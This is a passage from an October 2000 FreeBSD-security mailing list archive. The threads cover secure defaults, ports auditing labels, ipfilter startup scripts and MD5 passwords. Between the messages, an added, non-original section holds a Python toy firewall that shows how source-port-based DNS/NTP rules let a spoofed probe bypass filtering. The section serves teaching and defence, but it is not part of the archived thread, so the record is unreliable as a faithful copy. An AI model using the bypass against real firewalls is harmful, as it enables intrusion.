From owner-freebsd-security Sun Oct 1 1:24:31 2000
Delivered-To: freebsd-security@freebsd.org
Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id 9ECEF37B503 for ; Sun, 1 Oct 2000 01:24:28 -0700 (PDT)
Received: from algroup.co.uk (socks-fw.aldigital.co.uk [192.168.254.10]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id IAA02733; Sun, 1 Oct 2000 08:23:33 GMT
Message-ID: <39D6F422.CE408C66@algroup.co.uk>
Date: Sun, 01 Oct 2000 09:21:54 +0100
From: Adam Laurie
Organization: A.L. Group plc
X-Mailer: Mozilla 4.74 [en] (X11; U; FreeBSD 3.4-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Roman Shterenzon
Cc: Neil Blakey-Milner , security@FreeBSD.ORG
Subject: Re: cvs commit: ports/mail/pine4 Makefile (fwd)
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Roman Shterenzon wrote:
>
> On Sat, 30 Sep 2000, Neil Blakey-Milner wrote:
>
> > >
> > > > Surely the same applies to FreeBSD itself?
> > >
> > > I find it very odd that ports get so much positive pressure from this
> > > list to restrict/fix/exclude them when there is a security issue, but
> > > try and get something done to core FreeBSD scripts/services etc., and
> > > you'll get shot down in flames... Bizarre...
> >
> > Can you give examples?
>
> I can give you an example: ipfilter in the FreeBSD.
> It still doesn't have a startup script in /etc/rc*
> And it's not because it doesn't exist - in fact there's conf/20202, but
> nothing is being done with it.
> I guess that one can think of some other examples.

Some time ago I pointed out an error in the rc.firewall script (DNS & NTP
rules allowed attackers to bypass firewall by setting source port), which
turned into a weekend long battle (and they're still in there, BTW).
I was similarly treated when I suggested we update the daily/weekly/monthly
checks to look for alternative access methods (such as ssh). The current
Brett Glass flame war is another example...

I realise that in a lot of cases there are genuine issues between usability
and security, but in both of my above examples there were no changes to
services offered to the novice user (in fact they would have been invisible)
- the main arguments against making the changes seemed to be "why should we?
if they want to do it properly they should RTFM"...

The net result is, in my opinion, a sad one. Enthusiastic and able
contributors are put off from playing a useful part.... In my case I simply
gave up trying to contribute - we routinely replace existing bsd scripts
with our own improved ones instead.

cheers,
Adam
--
Adam Laurie
Tel: +44 (20) 8742 0755
A.L. Digital Ltd.
Fax: +44 (20) 8742 5995
Voysey House
Barley Mow Passage
http://www.aldigital.co.uk
London W4 4GB
mailto:adam@algroup.co.uk
UNITED KINGDOM
PGP key on keyservers

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Oct 1 1:25:24 2000
Delivered-To: freebsd-security@freebsd.org
Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id 4756C37B502 for ; Sun, 1 Oct 2000 01:25:21 -0700 (PDT)
Received: from algroup.co.uk (socks-fw.aldigital.co.uk [192.168.254.10]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id IAA02741; Sun, 1 Oct 2000 08:25:13 GMT
Message-ID: <39D6F48B.EC92A921@algroup.co.uk>
Date: Sun, 01 Oct 2000 09:23:39 +0100
From: Adam Laurie
Organization: A.L.
 Group plc
X-Mailer: Mozilla 4.74 [en] (X11; U; FreeBSD 3.4-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Michael Bryan
Cc: security@FreeBSD.ORG
Subject: Re: cvs commit: ports/mail/pine4 Makefile (fwd)
References: <200009301404.e8UE4xU64460@cwsys.cwsent.com> <20000930152917.E25121@149.211.6.64.reflexcom.com> <39D6707D.CEAB26E2@ursine.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Michael Bryan wrote:
>
> "Crist J . Clark" wrote:
> >
> > On Sat, Sep 30, 2000 at 11:43:20PM +0200, Roman Shterenzon wrote:
> > > Still, I think the default should be "insecure" install, since most
> > > machines are firewalled.
> >
> > [...]
> >
> > I guess I am one of the few that thinks we should default off for the
> > good of the newbie user, rather than save the newbie 5 minutes of RTFM
> > to turn on telnet and ftp. Just everyone hope no exploit like the
> > recent SGI telnetd bug is ever found hiding in FreeBSD's telnetd.
>
> I agree, mainly for the reasons you state --- the newbies that are most
> likely to install with defaults and no tweaking are often those who are
> running in environments where they need the most protection. The default
> install should be all services off, with an easy means to enable them
> explicitly during and after an install.

You can add my vote to that.

cheers,
Adam
--
Adam Laurie
Tel: +44 (20) 8742 0755
A.L. Digital Ltd.
Fax: +44 (20) 8742 5995
Voysey House
Barley Mow Passage
http://www.aldigital.co.uk
London W4 4GB
mailto:adam@algroup.co.uk
UNITED KINGDOM
PGP key on keyservers

From owner-freebsd-security Sun Oct 1 1:25:30 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8875837B66C; Sun, 1 Oct 2000 01:25:25 -0700 (PDT)
Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA82135; Sun, 1 Oct 2000 01:25:25 -0700 (PDT) (envelope-from kris@FreeBSD.org)
Date: Sun, 1 Oct 2000 01:25:24 -0700
From: Kris Kennaway
To: Igor Roshchin
Cc: security@freebsd.org
Subject: Re: advisory suggestion
Message-ID: <20001001012524.B9499@freefall.freebsd.org>
References: <200010010212.WAA49025@giganda.komkon.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200010010212.WAA49025@giganda.komkon.org>; from str@giganda.komkon.org on Sat, Sep 30, 2000 at 10:12:38PM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, Sep 30, 2000 at 10:12:38PM -0400, Igor Roshchin wrote:
> Affects: FreeBSD.....
> ... including 3.5.1-RELEASE

I thought I was doing that already..I always try and specifically mention
which releases were and were not vulnerable to the problem in question.

> Corrected: ....
> (including 4.1.1-RELEASE [and later])

Isn't it pretty obvious that once we fix a problem, it stays fixed, and so
if 4.1 is fixed then 4.1.1, 4.2, 4.3, 4.4, 4.4.145 (I predict a serious
problem with that release ;-), etc are all going to be fixed? :-)

Kris
--
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

From owner-freebsd-security Sun Oct 1 2:33:08 2000
Delivered-To: freebsd-security@freebsd.org
Received: from smtp02.iafrica.com (smtp02.iafrica.com [196.7.0.140]) by hub.freebsd.org (Postfix) with ESMTP id 7E3C437B502; Sun, 1 Oct 2000 02:33:02 -0700 (PDT)
Received: from [196.7.18.138] (helo=grimreaper.grondar.za ident=root) by smtp02.iafrica.com with esmtp (Exim 1.92 #1) id 13ffTw-000H7Y-00; Sun, 1 Oct 2000 11:32:28 +0200
Received: from grimreaper.grondar.za (mark@localhost [127.0.0.1]) by grimreaper.grondar.za (8.11.0/8.11.0) with ESMTP id e919WRl00389; Sun, 1 Oct 2000 11:32:28 +0200 (SAST) (envelope-from mark@grimreaper.grondar.za)
Message-Id: <200010010932.e919WRl00389@grimreaper.grondar.za>
To: Robert Watson
Cc: Warner Losh , Jordan Hubbard , security@FreeBSD.ORG
Subject: Re: Security and FreeBSD, my overall perspective
References:
In-Reply-To: ; from Robert Watson "Sat, 30 Sep 2000 19:05:51 -0400."
Date: Sun, 01 Oct 2000 11:32:26 +0200
From: Mark Murray
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Exposure:
>
> Whether or not the application should, in normal use, be exposed to data
> of untrusted origin (e-mail, data files from untrusted users, socket
> connections in or out-bound, etc).
>
> - Intended to be run with exposure to untrusted environments
> - Not intended to run with exposure to untrusted environments

This is policy - we should not mess with that, I don't think. _Everything_
in Unix sees an untrusted environment is the assumption.

> Auditing:
>
> Whether or not the application has been audited by FreeBSD security
> developers, or other trusted parties.
>
> - Known decent
> - Unknown
> - Known bad

I'd make this:

- Known good
- Believed good
- Unknown
- Believed bad
- Known bad

> Privilege:
>
> What amount of privilege and access this code will be run as, determining
> the level of damage possible as a result of an exploit.
>
> - Run with elevated privilege
> - Run by normal users
> - Run sandboxed

Right. This takes over the "exposure" item above.

M
--
Mark Murray
Join the anti-SPAM movement: http://www.cauce.org

From owner-freebsd-security Sun Oct 1 4:20:33 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail.vxu.se (oxeln.vxu.se [194.47.65.30]) by hub.freebsd.org (Postfix) with ESMTP id 02C6B37B502 for ; Sun, 1 Oct 2000 04:20:25 -0700 (PDT)
Received: from XGod ([194.47.111.20]) by mail.vxu.se (Netscape Messaging Server 4.15) with SMTP id G1R0TZ00.27R for ; Sun, 1 Oct 2000 13:20:23 +0200
Message-ID: <002401c02b99$a07a8ab0$6400a8c0@XGod>
From: "Andreas Alderud"
To:
Subject: Re: Security and FreeBSD, my overall perspective
Date: Sun, 1 Oct 2000 13:20:38 +0200
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I think it would be wise to have three ports of the ``same'' package.
My idea is to have, let's say, -SECURE, -STABLE and -CURRENT (the same could
be done with FreeBSD itself). The good thing about this would be that if a
port is labeled -SECURE it's not necessarily the most recent -STABLE
version, obviously, and the -SECURE port could then be marked with an
N-value for security level.
The real advantage of this would be if the BSDs would have a unified ports
system, as proposed by Chris Coleman, and incorporate the ideas of Jordan's
paper on the future package system. Because many developers find security
auditing a boring task, me included, this task could then be handled, in
most cases, by the OpenBSD or similar team since they like to do that kind
of stuff. - This would only happen if there was a unified ports system.

Doing this would also help people like me who hate to be forced to either
port an old version of a software or run the latest port that most often is
alpha or beta (typical opensource style :-( ), because I could either run
-STABLE or -SECURE depending on my level of paranoia. And people who like to
stay on the bleeding edge can do that with -CURRENT.

But then most of the problems would go away if FreeBSD got MAC etc,
fortunately the TrustedBSD team is working on that.

/Kind regards, David A. Alderud

From owner-freebsd-security Sun Oct 1 4:36:07 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail.kyx.net (cr95838-b.crdva1.bc.wave.home.com [24.113.50.147]) by hub.freebsd.org (Postfix) with ESMTP id 6C17837B502 for ; Sun, 1 Oct 2000 04:36:00 -0700 (PDT)
Received: from smp.kyx.net (unknown [10.22.22.45]) by mail.kyx.net (Postfix) with SMTP id A01BE1DC03; Sun, 1 Oct 2000 04:35:54 -0700 (PDT)
From: Dragos Ruiu
Organization: kyx.net
To: "Andreas Alderud" ,
Subject: Re: Security and FreeBSD, my overall perspective
Date: Sun, 1 Oct 2000 04:33:18 -0700
X-Mailer: KYX-CP/M [version core00-mail-92]
Content-Type: text/plain
References: <002401c02b99$a07a8ab0$6400a8c0@XGod>
In-Reply-To: <002401c02b99$a07a8ab0$6400a8c0@XGod>
MIME-Version: 1.0
Message-Id: <0010010437162T.11814@smp.kyx.net>
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sun, 01 Oct 2000,
Andreas Alderud wrote:
> I think it would be wise to have three ports of the ``same'' package.
> My idea is to have, let's say, -SECURE, -STABLE and -CURRENT (the same
> could be done with FreeBSD itself).

If you are going to unify the BSD ports please make sure there is a nice
way to organize the ports subset onto a CD, image, transfer etc...

I kinda like the lighter more stripped down - and therefore easier to
manipulate OpenBSD ports tree... while the FreeBSD one is nice for
comprehensiveness..... (Just so we don't start any religious debates
here. :-)

--dr

From owner-freebsd-security Sun Oct 1 6:15:44 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 67A2637B503 for ; Sun, 1 Oct 2000 06:15:39 -0700 (PDT)
Received: (qmail 11330 invoked by uid 0); 1 Oct 2000 13:15:37 -0000
Received: from p3ee20aa4.dip.t-dialin.net (HELO speedy.gsinet) (62.226.10.164) by mail.gmx.net with SMTP; 1 Oct 2000 13:15:37 -0000
Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id LAA30857 for security@FreeBSD.ORG; Sun, 1 Oct 2000 11:29:44 +0200
Date: Sun, 1 Oct 2000 11:29:44 +0200
From: Gerhard Sittig
To: security@FreeBSD.ORG
Subject: Re: cvs commit: ports/mail/pine4 Makefile (fwd)
Message-ID: <20001001112944.A5065@speedy.gsinet>
Mail-Followup-To: security@FreeBSD.ORG
References: <20000930160432.A15451@mithrandr.moria.org> <20000930234530.A18517@mithrandr.moria.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <20000930234530.A18517@mithrandr.moria.org>; from nbm@mithrandr.moria.org on Sat, Sep 30, 2000 at 11:45:30PM +0200
Organization: System Defenestrators Inc.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, Sep 30, 2000 at 23:45 +0200, Neil Blakey-Milner wrote:
>
> On Sat 2000-09-30 (23:37), Roman Shterenzon wrote:
> >
> > I can give you an example: ipfilter in the FreeBSD.
> > It still doesn't have a startup script in /etc/rc*
> > And it's not because it doesn't exist - in fact there's
> > conf/20202, but nothing is being done with it.

I still see this as partially caused by me (the originator). But after
your feedback and proofreading I (finally) plan on replying to the PR
with a cleanup -- to collect all the essence in a single message. That's
what I hope makes this proposal easier to review, judge, commit and MFC.
:) It will happen in the next week's beginning, when I have Darren's
response (see below).

> I can't see how this was shot down. Darren just doesn't seem
> to have done anything about it. Reply to the PR, and ask if he
> still intends to do anything about it, and if he doesn't, then
> we can assign it to someone else.

That's what I've done yesterday (ask Darren about which form of input
makes the patch the most comfortable to handle), the reply is still on
its way. And I don't blame Darren for not committing the patch yet. In
the current form it's not very attractive or easy to handle; and FreeBSD
work probably has lower prio in his busy job.

BTW: May I point to <20000915203531.E27034@speedy.gsinet>?

-------------------------------------------------------
Date: Fri, 15 Sep 2000 20:35:31 +0200
From: Gerhard Sittig
To: "freebsd-security@FreeBSD.ORG"
Subject: Re: ipf logging
-------------------------------------------------------

Therein I asked this very question "What can *I* do to make it better?"
(i.e. reduce reluctance or reasons for ignoring the PR without baffling
anyone and thus making things worse) -- there was no response. But I
guess it was due to its being buried in another thread.
> While it would be nice if developers regularly chased up things
> assigned to other developers and left for a while, it's best
> for the originator or stakeholders to actually _say_ something
> about it _in the PR_ and to the relevant lists if things go by
> too long.

When Darren cannot or won't act after the next f'up within a couple of
weeks I will step up with the request to have the PR assigned to some
other committer. Since it doesn't deal with ipf's internals but "only"
invokes utilities in the startup scripts I don't see a problem with
this. It's not about changing architecture or topology. It's not about
forcing ipfw users to change. It's just about reducing conflicts for
those utilizing ipf in a FreeBSD environment.

Until then everyone is free to extend rc.network by himself (we're
talking about admins here able to take their own actions after deciding
themselves for a tool). And I'm very well aware of the fact that
invoking send-pr doesn't give any warranty about being heard or
committed. But I would like to get negative feedback as well if anyone
sees a need for objection. Up to now there was only positive feedback
(and silence:).


virtually yours   82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig      true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
     If you don't understand or are scared by any of
   the above ask your parents or an adult to help you.
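Adam Laurie's remark earlier in this thread, that the rc.firewall DNS and NTP rules let an attacker bypass the firewall by setting the source port, describes a classic stateless-filter mistake: a rule that admits any UDP packet whose source port is 53 or 123 trusts a field the remote side chooses, so a probe sent from local port 53 reaches whatever destination port the attacker likes. The toy filter below is an added illustration written for this page; it is not FreeBSD's rc.firewall, not ipfw or ipf syntax, and not code from anyone in the thread. The rule format, the addresses and the packets are all constructed. It places a weak rule set beside one that records outbound queries and admits only replies to them, and shows that the spoofed-source-port probe passes the first and is dropped by the second.

```python
"""Toy packet filter: why 'allow from source port 53' is a bypass.

Added illustration for this page. The rule format, addresses and packets
are constructed; this is not rc.firewall, ipfw or ipf syntax.
"""
from dataclasses import dataclass
from typing import Optional

ANY = None  # wildcard in a rule field


@dataclass(frozen=True)
class Packet:
    proto: str
    src: str
    sport: int
    dst: str
    dport: int
    direction: str  # "in" (arriving from the network) or "out" (leaving this host)


@dataclass(frozen=True)
class Rule:
    action: str                     # "allow" or "deny"
    proto: Optional[str] = ANY
    sport: Optional[int] = ANY
    dport: Optional[int] = ANY
    direction: Optional[str] = ANY
    keep_state: bool = False        # remember the flow so only its reply is admitted

    def matches(self, p: Packet) -> bool:
        return all(
            want is ANY or want == have
            for want, have in ((self.proto, p.proto), (self.sport, p.sport),
                               (self.dport, p.dport), (self.direction, p.direction))
        )


class Filter:
    def __init__(self, rules):
        self.rules = list(rules)
        self.state = set()  # flows this host initiated: (proto, src, sport, dst, dport)

    def decide(self, p: Packet) -> str:
        # A reply to a flow we initiated is accepted before the static rules run.
        if p.direction == "in" and (p.proto, p.dst, p.dport, p.src, p.sport) in self.state:
            return "allow"
        for r in self.rules:           # first match wins
            if r.matches(p):
                if r.action == "allow" and r.keep_state and p.direction == "out":
                    self.state.add((p.proto, p.src, p.sport, p.dst, p.dport))
                return r.action
        return "deny"                  # default deny


# Constructed rule sets. The weak one keys on the *source* port, which the
# remote side controls; the hardened one keys on our own outbound queries.
WEAK_RULES = [
    Rule("allow", proto="udp", sport=53, direction="in"),    # meant as "DNS replies"
    Rule("allow", proto="udp", sport=123, direction="in"),   # meant as "NTP replies"
    Rule("allow", direction="out"),
    Rule("deny"),
]
HARDENED_RULES = [
    Rule("allow", proto="udp", dport=53, direction="out", keep_state=True),
    Rule("allow", proto="udp", dport=123, direction="out", keep_state=True),
    Rule("allow", direction="out"),
    Rule("deny"),
]

ME, RESOLVER, ATTACKER = "192.0.2.10", "192.0.2.53", "203.0.113.7"  # constructed


def run_scenario(rules):
    """Return (decision for a genuine DNS reply, decision for a spoofed probe)."""
    fw = Filter(rules)
    fw.decide(Packet("udp", ME, 40000, RESOLVER, 53, "out"))        # our DNS query
    reply = fw.decide(Packet("udp", RESOLVER, 53, ME, 40000, "in"))  # the real answer
    # Attacker binds local port 53 and aims at portmapper (111) on our host.
    probe = fw.decide(Packet("udp", ATTACKER, 53, ME, 111, "in"))
    return reply, probe


if __name__ == "__main__":
    print("weak:    ", run_scenario(WEAK_RULES))      # ('allow', 'allow')
    print("hardened:", run_scenario(HARDENED_RULES))  # ('allow', 'deny')
```

Both rule sets let the genuine reply through; only the weak one also lets the probe through, because nothing in it ties an inbound packet to a query this host actually sent. The same reasoning applies to any "reply" rule written in terms of source port alone, whether for DNS, NTP or anything else.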
From owner-freebsd-security Sun Oct 1 7:02:01 2000
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 32AB237B66D for ; Sun, 1 Oct 2000 07:01:59 -0700 (PDT)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id KAA53547; Sun, 1 Oct 2000 10:01:52 -0400 (EDT) (envelope-from robert@fledge.watson.org)
Date: Sun, 1 Oct 2000 10:01:51 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
To: Garrett Wollman
Cc: cjclark@alum.mit.edu, security@FreeBSD.ORG
Subject: Re: Multiple userids, one user
In-Reply-To: <200010010526.BAA12242@khavrinen.lcs.mit.edu>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sun, 1 Oct 2000, Garrett Wollman wrote:

> < said:
>
> > Why not just run each program under a different user?
>
> To some extent I do this. When I am forced to use a Web browser
> configured insecurely (which for some inexplicable reason always seems
> to involve managing my finances), I switch to another VT, log in as my
> alter ego, and do what I need to do. Of course, not even my alter ego
> gives a valid e-mail address to the Web browser....

One of the problems with this technique is X Windows -- while FreeBSD will
provide effective partitioning of users for the purposes of integrity
(confidentiality is another question given our default permissions :-),
providing the application with unfettered access to your X display does a
lot to undo those benefits. At one point, I was using Xnest as a target
display for SSH sessions to untrusted workstations. While it was not
designed for that (and probably needs auditing), it's a step forwards.
Assigning an Xnest per virtual uid would reflect the kernel-visible
partitioning scheme. There have been a number of attempts at CMW
(Compartmental Mode Workstations) X environments that prevent
control/information leakage between labeled processes, but those have some
practicality limits (aside from not being available freely :-). I was also
told at one point that the new Broadway X Windows would have facilities
for isolating and limiting the scope of particular applications, with
things like web browsing, untrusted clients, etc, in mind. Not sure if
anything came of that.

Robert N M Watson
robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
TIS Labs at Network Associates, Safeport Network Services

From owner-freebsd-security Sun Oct 1 7:51:57 2000
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id BCA4137B502 for ; Sun, 1 Oct 2000 07:51:54 -0700 (PDT)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id KAA53996; Sun, 1 Oct 2000 10:51:27 -0400 (EDT) (envelope-from robert@fledge.watson.org)
Date: Sun, 1 Oct 2000 10:51:27 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
To: Mark Murray
Cc: Warner Losh , Jordan Hubbard , security@FreeBSD.ORG
Subject: Re: Security and FreeBSD, my overall perspective
In-Reply-To: <200010010932.e919WRl00389@grimreaper.grondar.za>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sun, 1 Oct 2000, Mark Murray wrote:

> > Exposure:
> >
> > Whether or not the application should, in normal use, be exposed to data
> > of untrusted origin (e-mail, data files from
> > untrusted users, socket
> > connections in or out-bound, etc).
> >
> > - Intended to be run with exposure to untrusted environments
> > - Not intended to run with exposure to untrusted environments
>
> This is policy - we should not mess with that, I don't think. _Everything_
> in Unix sees an untrusted environment is the assumption.

While I agree that is true, I think that we regularly make distinctions,
for the purposes of advisories, between buffer overflows in command line
tool arguments of binaries that do not elevate privileges, and those that
do. Similarly, we consider overflows in command line arguments of tools
running with privilege and overflows in input/output of tools running with
privilege. So there is something in this distinction that is worth
considering. Certainly, it is the case that all of them should be fixed,
but it's not clear that all are worth an advisory, and that our risk/trust
factor shouldn't reflect that distinction.

> > Privilege:
> >
> > What amount of privilege and access this code will be run as, determining
> > the level of damage possible as a result of an exploit.
> >
> > - Run with elevated privilege
> > - Run by normal users
> > - Run sandboxed

The reason I made this distinction was to try and quantify the cost of a
software failure: if Apache is compromised running as nobody, that's
substantially better than inetd compromised running as root. Not ideal,
mind you, but in the grand scale of things, an improvement (hence why it
runs as nobody :-). I think this is a quantifiably different measure than
the amount of risk associated with the program due to the type and quality
of data it processes. There probably needs to be another couple of items
here quantifying network compromise (i.e., firewall proxy failure, etc).
Robert N M Watson
robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
TIS Labs at Network Associates, Safeport Network Services

From owner-freebsd-security Sun Oct 1 10:16:50 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id DB57737B502 for ; Sun, 1 Oct 2000 10:16:45 -0700 (PDT)
Received: (qmail 4093 invoked by uid 0); 1 Oct 2000 17:16:44 -0000
Received: from p3ee21622.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.34) by mail.gmx.net with SMTP; 1 Oct 2000 17:16:44 -0000
Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id PAA31336 for security@FreeBSD.ORG; Sun, 1 Oct 2000 15:48:02 +0200
Date: Sun, 1 Oct 2000 15:48:02 +0200
From: Gerhard Sittig
To: security@FreeBSD.ORG
Subject: Re: Security and FreeBSD, my overall perspective
Message-ID: <20001001154802.C5065@speedy.gsinet>
Mail-Followup-To: security@FreeBSD.ORG
References: <002401c02b99$a07a8ab0$6400a8c0@XGod> <0010010437162T.11814@smp.kyx.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <0010010437162T.11814@smp.kyx.net>; from dr@kyx.net on Sun, Oct 01, 2000 at 04:33:18AM -0700
Organization: System Defenestrators Inc.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sun, Oct 01, 2000 at 04:33 -0700, Dragos Ruiu wrote:
>
> If you are going to unify the BSD ports please make sure there
> is a nice way to organize the ports subset onto a CD, image,
> transfer etc...

Isn't there already such a project? I remember having read about it in
the last two weeks. If only I had set a bookmark! But the effort put
into the several distros' ports systems could gain really overwhelming
results when it's bundled ...
virtually yours   82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig      true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
     If you don't understand or are scared by any of
   the above ask your parents or an adult to help you.

From owner-freebsd-security Sun Oct 1 13:51:02 2000
Delivered-To: freebsd-security@freebsd.org
Received: from sentry.granch.com (sentry.granch.com [212.109.197.55]) by hub.freebsd.org (Postfix) with ESMTP id B940037B502 for ; Sun, 1 Oct 2000 13:50:51 -0700 (PDT)
Received: from sentry.granch.ru (IDENT:shelton@localhost [127.0.0.1]) by sentry.granch.com (8.9.3/8.9.3) with ESMTP id DAA54970; Mon, 2 Oct 2000 03:22:08 +0700 (NOVST)
Message-ID: <39D79CF0.D794F732@sentry.granch.ru>
Date: Mon, 02 Oct 2000 03:22:08 +0700
From: "Rashid N. Achilov"
Reply-To: achilov@granch.ru
Organization: Granch Ltd.
X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: ru, en
MIME-Version: 1.0
To: "Vladimir B. Grebenschikov"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: MD5 passwords vs DES
References: <14789.42660.401430.305445@vbook.express.ru>
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

"Vladimir B. Grebenschikov" wrote:
>
> I have a question:
>
> Do anybody have ideas to add 'default crypting mode' for utilities
> like passwd, adduser, etc ?
>

Manually change all users' passwords to MD5, then simply edit the symlink
libcrypt.so.2 (I assume 4.1-RELEASE) to point to libscrypt.so.2 and
libcrypt.a to point to libscrypt.a. Now you can't use DES passwords until
you revert the links back, but all created users now will have MD5-crypted
passwords

--
With Best Regards.
Rashid N. Achilov (RNA1-RIPE), Brainbench ID: 28514
Granch Ltd.
lead engineer, e-mail: achilov@granch.ru
tel/fax (383-2) 24-2363

From owner-freebsd-security Sun Oct 1 13:58:14 2000
Delivered-To: freebsd-security@freebsd.org
Received: from klapaucius.zer0.org (klapaucius.zer0.org [204.152.186.45]) by hub.freebsd.org (Postfix) with ESMTP id 3B2D237B503 for ; Sun, 1 Oct 2000 13:58:11 -0700 (PDT)
Received: by klapaucius.zer0.org (Postfix, from userid 1001) id 0D19E239A48; Sun, 1 Oct 2000 13:58:11 -0700 (PDT)
Date: Sun, 1 Oct 2000 13:58:11 -0700
From: Gregory Sutter
To: Gerhard Sittig
Cc: security@FreeBSD.ORG
Subject: Re: Security and FreeBSD, my overall perspective
Message-ID: <20001001135810.I23587@klapaucius.zer0.org>
References: <002401c02b99$a07a8ab0$6400a8c0@XGod> <0010010437162T.11814@smp.kyx.net> <20001001154802.C5065@speedy.gsinet>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20001001154802.C5065@speedy.gsinet>; from Gerhard.Sittig@gmx.net on Sun, Oct 01, 2000 at 03:48:02PM +0200
Organization: Zer0
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 2000-10-01 15:48 +0200, Gerhard Sittig wrote:
> On Sun, Oct 01, 2000 at 04:33 -0700, Dragos Ruiu wrote:
> >
> > If you are going to unify the BSD ports please make sure there
> > is a nice way to organize the ports subset onto a CD, image,
> > transfer etc...
>
> Isn't there already such a project? I remember having read
> about it in the last two weeks. If only I had set a bookmark!
> But the effort put into the several distros' ports systems could
> gain really overwhelming results when it's bundled ...

http://www.openpackages.org/

Greg
--
Gregory S. Sutter                     Bureaucrats cut red tape--lengthwise.
mailto:gsutter@zer0.org
http://www.zer0.org/~gsutter/
PGP DSS public key 0x40AE3052

From owner-freebsd-security Sun Oct 1 14:09:26 2000
Delivered-To: freebsd-security@freebsd.org
Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id 8BD1F37B502; Sun, 1 Oct 2000 14:09:22 -0700 (PDT)
